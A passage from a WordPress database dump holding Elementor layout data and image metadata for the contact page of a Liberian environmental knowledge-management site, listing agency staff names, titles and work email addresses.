href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34842,80,'_elementor_pro_version','3.7.1'),(34844,5091,'_wp_attached_file','2022/09/wonpue.jpg'),(34845,5091,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2022/09/wonpue.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"wonpue-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"wonpue-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"wonpue-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"wonpue-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"wonpue-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"wonpue-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:18:\"wonpue-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"wonpue-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:18:\"wonpue-700x650.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:18:\"wonpue-600x559.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:18:\"wonpue-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:18:\"wonpue-700x640.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34856,5093,'_wp_attached_file','2022/09/nadine.jpg'),(34857,5093,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:18:\"2022/09/nadine.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"nadine-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"nadine-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"nadine-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"nadine-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"nadine-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"nadine-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:18:\"nadine-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"nadine-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:18:\"nadine-700x650.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:18:\"nadine-600x559.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:18:\"nadine-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:18:\"nadine-700x640.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34858,5094,'_elementor_edit_mode','builder'),(34859,5094,'_elementor_template_type','wp-page'),(34860,5094,'_elementor_version','3.6.6'),(34861,5094,'_wp_page_template','default'),(34862,5094,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:jduolupeh@gmail.com\\\">jduolupeh@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a 